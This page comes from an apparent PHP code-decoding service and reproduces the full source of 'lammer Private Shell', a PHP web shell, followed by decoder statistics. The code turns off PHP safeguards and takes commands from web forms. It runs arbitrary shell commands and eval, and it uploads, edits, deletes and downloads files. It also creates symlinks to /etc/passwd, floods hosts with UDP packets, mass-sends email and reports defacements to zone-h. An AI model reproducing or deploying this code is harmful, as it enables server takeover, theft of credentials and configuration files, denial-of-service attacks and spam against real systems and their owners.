Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php $ini_reconf = array( 'display_errors' => '0', 'disable_functions' => '', 'fi..

Decoded Output download

NoneNoneNoneNone 
--=[ lammer Private Sheller ]=--<br> 
+---++---==[ Version : 1.0 ]==---++---+<br>

Did this file decode correctly?

Original Code

<?php 
$ini_reconf = array(
	'display_errors' => '0',
	'disable_functions' => '',
	'file_uploads' => 'On',
	'max_execution_time' => '0',
	'memory_limit' => '1024M',
	'open_basedir' => '',
	'safe_mode' => 'Off',
	'sql.safe_mode' => 'Off',
	'upload_max_filesize' => '1024M',
);

foreach ($ini_reconf as $key => $value) {
	@ini_set($key, $value);
}
 function lammer() { ?>
<html>
<head>
  <title>lammer Private SHELL</title>
</head>
<body bgcolor=black>
<center>
<style>
input{
background-color: red; font-size: 8pt; color: #00; font-family: Tahoma; border: 0 solid #66;
}
button{
background-color: red; font-size: 8pt; color: #00; font-family: Tahoma; border: 0 solid #66;
}
</style>
<style type="text/css"> body{
 } .phpinfo table{
 } .phpinfo td{
 background:#111111;
 color:#cccccc;
 } .phpinfo th, th{
 background:#191919;
 border-bottom:1px solid #333333;
 font-weight:normal;
 } .phpinfo h2, .phpinfo h2 a{
 text-align:center;
 padding:0;
 background:#222222;
 padding:4px 0;
 } .explore{
 } .explore a {
 text-decoration:none;
 } .explore td{
 border-bottom:1px solid #333333;
 } .explore th{
 font-weight:normal;
 } .explore th:hover , .phpinfo th:hover{
 border-bottom:1px solid #4C83AF;
 } .explore tr:hover{
 background:#111111;
 } .viewfile{
 background:#EDECEB;
 color:#000000;
 } .sembunyi{
 display:none;
 } </style>
<font color=green>
| 
<a href="<?php echo $_SERVER['PHP_SELF']; ?>">Home</a> |
<a href="?pwd=<?php echo $_GET['pwd'] ?>&filemanager">File Manager</a> |
<a href="?pwd=<?php echo $_GET['pwd'] ?>&cmd">Shell Command</a> |
<a href="?pwd=<?php echo $_GET['pwd'] ?>&upload">Upload File</a> |
<a href="?eval">eval</a> |
<a href="?sym">Symlink</a> |
<a href="?dos">D O S</a> |
<a href="?phpinfo">phpInfo</a> |
<a href="?zone">Zone</a> |
<a href="?mail">Mail</a> |
<a href="?tool">Tools</a> |
<a href="?kill">Kill Me</a> |
<br><hr width=750><br>
<?php }
 ini_set("display_errors", false); error_reporting(0);
	if(isset($_GET['dfile'])){}else{lammer();}
?>
<?php
function about(){
echo '
--=[ lammer Private Sheller ]=--<br>
+---++---==[ Version : 1.0 ]==---++---+<br>
';
}

function siz($file){
 if($size = @filesize($file)){
 if($size <= 1024) return $size;
 else{
 if($size <= 1024*1024) {
 $size = @round($size / 1024,2);;
 return "$size kb";
 } else {
 $size = @round($size / 1024 / 1024,2);
 return "$size mb";
 } } } else return "???";
 }

function ex($com) {
	if (function_exists(shell_exec)) { 
		echo shell_exec($com); 
	} elseif (function_exists(system)) { 
		echo system($com); 
	} elseif (function_exists(passthru)) { 
		echo passthru($com);
	} elseif (function_exists(exec)) { 
		echo exec($com);
	}
}

function view($file) {

 echo "</center><div class=\"viewfile\">";
 echo nl2br(htmlentities((@file_get_contents($file))));
 echo "</div>";
}
function edit($file) {

 echo '<textarea name="txt" cols="90" rows="18" style="color:#0F0; background-color: #000000; border: 4px inset #3399FF;">';
 echo (@file_get_contents($file));
 echo "</textarea>";
}



function get_perms($file) {
 if($mode=@fileperms($file)){
 $perms='';
 $perms .= ($mode & 00400) ? 'r' : '-';
 $perms .= ($mode & 00200) ? 'w' : '-';
 $perms .= ($mode & 00100) ? 'x' : '-';
 $perms .= ($mode & 00040) ? 'r' : '-';
 $perms .= ($mode & 00020) ? 'w' : '-';
 $perms .= ($mode & 00010) ? 'x' : '-';
 $perms .= ($mode & 00004) ? 'r' : '-';
 $perms .= ($mode & 00002) ? 'w' : '-';
 $perms .= ($mode & 00001) ? 'x' : '-';
 return $perms;
 } else return "??????????";
 }
//downloader
if(isset($_GET['dfile'])){
header('Content-Length:'.filesize($_GET['dfile']).'');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.$_GET['dfile'].'"');
readfile($_GET['dfile']);
//end downloader
}
 $pwd=$_GET['pwd'];
 if(isset($_GET['delete']) && ($_GET['delete'] != "")){
 $file = $_GET['delete'];
 @unlink($file);
 ex("rm -f $file");
 echo "<script>location='".$_SERVER['PHP_SELF']."?filemanager&pwd=$pwd'</script>";
 } elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){
 @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR));
  echo "<script>location='".$_SERVER['PHP_SELF']."?filemanager&pwd=$pwd'</script>";
 } elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){
 $path = $pwd.$_GET['mkdir'];
 @mkdir($path);
} ?>
<?php
if(isset($_GET['sym'])){ ?>
<form method=POST >
<p>
TARGET : <br><input type="text" name="in" value="/etc/passwd"/><br>
LINK_NAME : <br><input type="text" name="des" value="lammer.txt"/><br>
<input type="submit" value="Run" />
</p>
</form>

<?php
$in=$_POST['in'];
$des=$_POST['des'];
if(isset($_POST['in']) || isset($_POST['des'])){
if (function_exists(symlink)) {
	symlink($in,$des);
echo "<br>Symlink Created <a href='$des'>$des</a>";

} else {
	$com="ln -s ".$in." ".$des;
	ex($com);
	$com="ln -s ".$in." ".$des;
	ex($com);
	$com="perl -e 'symlink(\"".$in."\",\"".$des."\")'";
	ex($com);
echo "<br>Symlink Created <a href='$des'>$des</a>";
}

}

?>
<?php }elseif(isset($_GET['dos'])){  ?>
<div  style="color:#fff;"  class="myleft" >
	  <?php
$ipp=$_SERVER['REMOTE_ADDR'];
 
if(isset($_POST['host'])&&isset($_POST['time'])){
    $packets = 0;
    ignore_user_abort(TRUE);
    set_time_limit(0);

    $exec_time = $_POST['time'];

    $time = time();
    $max_time = $time+$exec_time;

    $host = $_POST['host'];

    for($i=0;$i<65000;$i++){
    $out .= 'X';
    }
    while(1){
    $packets++;
    if(time() > $max_time){
  break;
    }
 	if ($_POST['port' ]=="rand"){
	  $rand = rand(1,65000);
	}else{
	$rand=$_POST['port'];
	}
    $fp = fsockopen("udp://$host", $rand, $errno, $errstr, 5);
    if($fp){
  fwrite($fp, $out);
  fclose($fp);
    }
    }
	echo "";
    echo "<center><br>Completed with <b> $packets (" . round(($packets*65)/1024, 2) . " MB)</b> packets averaging <b>". round($packets/$exec_time, 2) . "</b> packets per second \n  to  <b>" . $host . "</b><hr width=600>" ;
	echo "<font color=red>";
	echo "<blink><font color=red size=2><b> </b></blink><br>";
	echo '<form action="#" method=POST>
    <input type="hidden" name="act" value="lammerlammerlammer">
    <b> Ip: </b> <br><input type=text name=host value=><br>
    <b> Time </b> (seconds): <br><input type=text name=time value=><br>
	<b> Port </b>(Random Port=rand) <br><input type=text name=port value=rand size=30><br><br>
    <input type=submit value="  Start Attack  "><br></form>';
}else{ echo "<center><br><blink><font color=red size=2><b> </b></blink>";
	echo '<form action="" method=POST>
    <input type="hidden" name="act" value="lammerlammerlammer">
    <b> Ip: </b> <br><input type=text name=host value=><br>
    <b> Time </b> (seconds): <br><input type=text name=time value=><br>
	<b> Port </b>(Random Port=rand)<BR><input type=text name=port value=rand size=30><br><br>
    <input type=submit value="  Start Attack  "><br></form>';
}
 //DOS CODE ENDED
 ?>
<?php }elseif(isset($_GET['cmd'])){  ?>
<?php if ($_POST['command'] != ''){echo '<textarea readonly cols="90" rows="18" style="color:#0F0; background-color: #000000; border: 4px inset #3399FF;">'; $exec_type=$_POST['execute_type'];if(!isset($_GET['pwd'])){$_GET['pwd']="";} $com="cd \"".$_GET['pwd']."\"&&".$_POST['command'];if (isset($exec_type)) { if ($exec_type=="1") { echo shell_exec($com); } elseif($exec_type=="2") { echo system($com);  } elseif ($exec_type=="3") { passthru($com); } elseif ($exec_type=="4") { if (function_exists(shell_exec)) { echo shell_exec($com); } elseif (function_exists(system)) { echo system($com); } elseif (function_exists(passthru)) { echo passthru($com); } else { echo "[-]I can not Execute any command"; }     } }  } echo '</textarea>'; echo' 		<form method=POST >			<p> 			command  <br><input type="text" name="command" /> 			 <br>Method <br><select name="execute_type"> 				<option value=4>Auto Select</option> 				<option value=1>shell exec</option> 				<option value=2>system</option> 				<option value=3>passthru</option> 								</select> 			<br><input type="submit" value="Execute" /> 	 			</p> 		</form>';
?>
<?php }elseif(isset($_GET['zone'])){  ?>
<?php
ob_start(); 
$sub = get_loaded_extensions(); 
if(!in_array("curl", $sub)){ die('Curl NotFound'); } 

if($_POST) { 
$hacker = $_POST['defacer']; 
$site   = $_POST['domain']; 
if ($hacker == "") { die ("<center>Please Enter hacker name !</font><center>"); } 
elseif($site == "") { die("<center>Please Enter sites url !</font></center>"); } 
$i = 0; 
$sites = explode("\n", $site); 
while($i < count($sites)) { 
if(substr($sites[$i], 0, 4) != "http") { $sites[$i] = "http://".$sites[$i]; } 
 poster("http://zone-h.org/notify/single", $hacker,  $sites[$i]); 
++$i; 
} 
echo "<center><font color=red>ok</font></center>";  
}else{ 
echo '<center> 
<form action="" method="post"> 
<div id="option"> 
<p>Defacer<br /> 
    <span class="ok"><input type="text" name="defacer"  size="40" /></span> </p> 

<p>Site list</font> <br /> 

    <span class=""><textarea name="domain" cols="43"  rows="17"></textarea></span> </p> 

<p><input type="submit" value="send " />  

</form> 
<br> 
</div> 
</center>'; 
} 

function poster($url, $hacker, $site ) 
 { 
$k = curl_init(); 
curl_setopt($k, CURLOPT_URL, $url); 
curl_setopt($k,CURLOPT_POST,true); 
curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=".   $site."&hackmode=2&reason=1"); 
curl_setopt($k,CURLOPT_FOLLOWLOCATION, true); 
curl_setopt($k, CURLOPT_RETURNTRANSFER, true); 
$kubra = curl_exec($k); 
curl_close($k); 
return $kubra; 
} 
?>
<?php }elseif(isset($_GET['mail'])){  ?>
<? if(isset($_POST['email'])){
    ?><div  style="color:#fff;"  class="myleft" ><?php
    
	  $to = $_POST['to'];
	  $subject = $_POST['subject'];
	  $text = $_POST['text'];
	  
	  $number = $_POST['number'];
	   
      for($i=1; $i++; $i < $number){
	  mail($to, $subject, $text);
	}}

    ?>	
	<br><br>
	<center>
    <table align="center" dir="ltr" width="200px" border="0" cellspacing="1" cellpadding="1">
  <tr>
    <td colspan="2" style="color:#fff;" align="center">Send Mail</td>
   </tr>
  <tr><form action="" method="post" name="form11" >    
    <td>To: </td>
    <td><input name="to" value="[email protected]" type="text"></td>
  </tr>
  
  <tr>
    <td style="color:#fff;" >Subject: </td>
    <td><input name="subject" value="[NO SUBJECT]" type="text"></td>
  </tr>
  <tr>
    <td style="color:#fff;" >Text: </td>
    <td> <textarea rows="10" cols="60" name="text" >test</textarea></td>
  </tr>
  <tr>
    <td style="color:#fff;" >Num: </td>
    <td><input name="number" value="80" type="text"></td>
  </tr>
  <tr>
     <td colspan="2" align="center"><input name="sub" value="send" type="submit"></td>
  </tr></form>
</`>
</center>
</div>
<?php }elseif(isset($_GET['upload'])){  ?>
<?php if ($_GET['pwd' ]==''){ $dir = getcwd();}else{$dir=$_GET['pwd'];} if (!empty ($_FILES['UP'])) {     move_uploaded_file($_FILES['UP']['tmp_name'],$dir.'/'.$_FILES['UP']['name']);     $lammer_text = "<b>Uploaded Successfully</b><br>file name : $dir/".$_FILES['UP']['name']."<br>file size : ".$_FILES['UP']['size']."<br>file type : ".$_FILES['UP']['type']."<br>"; }  echo " <left> <form method='POST' enctype='multipart/form-data'> <input type='file' name='UP' size='23' > <input type='submit' value='Upload' size='35' > </form> </left>"; echo $lammer_text; ?>
<?php }elseif(isset($_GET['eval'])){  ?>
<?php if(isset($_POST['ev'])){eval($_POST['ev']);} ?>
<form method="POST"><p align="center"><textarea rows="19" name="ev" cols="87"></textarea><br><input type=submit value="Execute"></form></p>
<?php }elseif(isset($_GET['phpinfo'])){  ?>
<?php
  @ob_start();
 @eval("phpinfo();");
 $buff = @ob_get_contents();
 @ob_end_clean();
 $st = strpos($buff,"<body>")+6;
 $en = strpos($buff,"</body>");
 echo "<div class=\"phpinfo\">".substr($buff,$st,$en-$st)."</div>";
 ?>
<?php }elseif(isset($_GET['passwd'])){  ?>
<textarea readonly cols="90" rows="18" style="color:#0F0; background-color: #000000; border: 4px inset #3399FF;">
<?php

for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd
	$ara = posix_getpwuid($uid);
	if (!empty($ara)) {
	while (list ($key, $val) = each($ara)){
		print "$val:";
	}
	print "\n";
	}
}

?>
</textarea>
<?php }elseif(isset($_GET['tool'])){  ?>
TOOLS<br>
| <a href="?passwd">Read /etc/passwd</a> |<br>
| <a href="?perl">Perl Eval</a> |<br>
| <a href="?code">Encode to md5,base64,Des</a> |<br>
| <a href="?fastcmd">Fast Command</a> |<br>

 
<?php }elseif(isset($_GET['kill'])){  ?>
<?php
@unlink($_SERVER["DOCUMENT_ROOT"].$_SERVER["SCRIPT_NAME"]);
$com="rm -f ".$_SERVER["DOCUMENT_ROOT"].$_SERVER["SCRIPT_NAME"];

	if (function_exists(shell_exec)) { 
		echo shell_exec($com); 
	} elseif (function_exists(system)) { 
		echo system($com); 
	} elseif (function_exists(passthru)) { 
		echo passthru($com);
	} elseif (function_exists(exec)) { 
		echo exec($com);
	}
echo "<script>alert('I Was Killed :(')</script>";
echo "<script>location='".$_SERVER['PHP_SELF']."?'</script>";
?>
<?php }elseif(isset($_GET['filemanager'])){  ?>
<font color=red>
<?php

 if(isset($_GET['pwd'])){$pwd=$_GET['pwd'];}else{$pwd=getcwd();}
 $pwd=realpath($pwd);
 chdir($pwd);
 echo "<form method=GET action='http://127.0.0.1/my/lammer/shell.php'>
 <input name='filemanager' type=text hidden><input value='$pwd' name='pwd' type=text size=40> <input type=submit value='go'>
 </form>";
  echo '<table style="width:50%;" border=".1"> ';

 $fname = array();
 $dname = array();
 if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
 else $posix = FALSE;
 if($dh = opendir($pwd)){
 while($file = readdir($dh)){
 if(is_dir($file)){
 $dname[] = $file;
 } elseif(is_file($file)){
 $fname[] = $file;
 } } closedir($dh);
 } sort($fname);
 sort($dname);
 $path = @explode(DIRECTORY_SEPARATOR,$pwd);
 $tree = @sizeof($path);
 foreach($dname as $dd){
 $name=posix_getpwuid(fileowner($dd));
 $group=@posix_getgrgid(@filegroup($dd));
 $owner=$name['name'].":".$group['name'];
 if($dd=="." || $dd==".."){$type="LINK";$op="";}else{$type="DIR";$op="<a href='?filemanager&pwd=$pwd&Fdelete=$pwd/$dd'>R</a>";}
 $ok=realpath("$pwd/$dd");
 echo "<td><font color=red><a href='?filemanager&pwd=$ok'>[ $dd ]</a></td><td><font color=red>$type</td><td><font color=red>$owner</td><td><font color=red>".get_perms($dd)."</td><td><font color=red>".siz($dd)."</td><td><font color=red>$op</td><tr></tr>";
 }
 foreach($fname as $ff){
 $name=@posix_getpwuid(@fileowner($ff));
 $group=@posix_getgrgid(@filegroup($ff));
 $owner=$name['name'].":".$group['name'];
  $ok=realpath("$pwd");
 echo "<td><font color=red><a href='?view=$ok/$ff&pwd=$ok'>$ff</td><td><font color=red>File</td><td><font color=red>$owner</td><td><font color=red>".get_perms($ff)."</td><td><font color=red>".siz($ff)."</td><td><font color=red><a href='?pwd=$pwd&dfile=$pwd/$ff'>D</a>-<a href='?filemanager&pwd=$pwd&delete=$pwd/$ff'>R</a>-<a href='?edit=$pwd/$ff&pwd=$pwd'>E</a></td><tr></tr>";
 }
echo "</table>";

?>

<?php }elseif(isset($_GET['view'])){  ?>
<?php view($_GET['view']); ?>


<?php }elseif(isset($_GET['edit'])){  ?>
<?php if(isset($_POST['save'])){
 $file = $_GET['edit'];
 $content = $_POST['txt'];

 if($filez = @fopen($file,"w")){
 $time = date("d-M-Y H:i",time());
 if(@fwrite($filez,$content)) {$msg = "file saved at ".$time;  echo "<script>alert('$msg')</script>";}
 else{ $msg = "failed to save";  echo "<script>alert('$msg')</script>";}
 
 @fclose($filez);
 } 
} 
?>

<form method=POST>
<?php edit($_GET['edit']); ?>
<br><input type=submit name="save" value='Save'></form> 
 
<?php }elseif(isset($_GET['perl'])){  ?>
<?php if(isset($_POST['ev'])){
$perl=new perl();
ob_start();
$perl->eval($_POST['ev']);
$exec=ob_get_contents();
ob_end_clean();
echo $exec;
}
 ?>
<form method="POST"><p align="center"><textarea rows="19" name="ev" cols="87"></textarea><br><input type=submit value="Execute"></form></p>
<?php }elseif(isset($_GET['fastcmd'])){  ?>
<?php if(isset($_POST['runcmd'])){echo '<textarea readonly cols="90" rows="18" style="color:#0F0; background-color: #000000; border: 4px inset #3399FF;">';ex($_POST['runcmd']);echo "</textarea>";}?>
<form method=POST> 
<br><b>Fast Command<Br></b><select size="1" name="runcmd"> 
<option value='ps aux'>ps aux</option> 
<option value='cat /etc/passwd'>cat /etc/passwd</option> 
<option value='find / -name "*config*php"'>find / -name "*config*php"</option> 
<option value='cat /etc/httpd/conf/httpd.conf'>cat /etc/httpd/conf/httpd.conf</option> 
<option value='ls -la /var/lib/mysql/'>ls -la /var/lib/mysql/</option> 
<option value='netstat -a'>netstat -a</option> 
<option value='perl -v'>perl -v</option> 
<option value='gcc -v'>gcc -v</option> 
<option value='tar -v'>tar --help</option> 
<option selected>...Select command...</option> 
</select><br> 
<input type=submit value='...Exec...'></form> 

<?php }elseif(isset($_GET['code'])){  ?>
<?php if ($_POST['hash'] != ''){
 echo "MD5:<input size=100 value='".md5($_POST['hash'])."'><br>"; 
 echo "SHA1:<input size=100 value='".sha1($_POST['hash'])."'><br>"; 
 echo "DES:<input size=100 value='".crypt($_POST['hash'])."'><br>"; 
 echo "base64_encode:<input size=100 value='".base64_encode($_POST['hash'])."'><br>"; 
 echo "base64_decode:<input size=100 value='".base64_decode($_POST['hash'])."'><br>"; 

 
	}  echo' 		<form method=POST >			<p> 			text  <br><input type="text" name="hash" /> <br><input type="submit" value="Convert" /> 	 			</p> 		</form>';
?>

<?php }else{  	if(isset($_GET['dfile'])){}else{about();}?>

<?php } 	if(isset($_GET['dfile'])){}else{elammer();}  function elammer() {?>
<hr width=750><center>
<?php } ?>

Function Calls

about	1
lammer	1
elammer	1
ini_set	2
error_reporting	1

Variables

$key	1024M
$pwd	None
$value	1024M
$ini_reconf	[{'key': 'display_errors', 'value': '0'}, {'key': 'disable_functions', 'value': ''}, {'key': 'file_uploads', 'value': 'On'}, {'key': 'max_execution_time', 'value': '0'}, {'key': 'memory_limit', 'value': '1024M'}, {'key': 'open_basedir', 'value': ''}, {'key': 'safe_mode', 'value': 'Off'}, {'key': 'sql.safe_mode', 'value': 'Off'}, {'key': 'upload_max_filesize', 'value': '1024M'}]

Stats

MD5	a07049873902ec6e28060d6d7a8b48f7
Eval Count	0
Decode Time	236 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats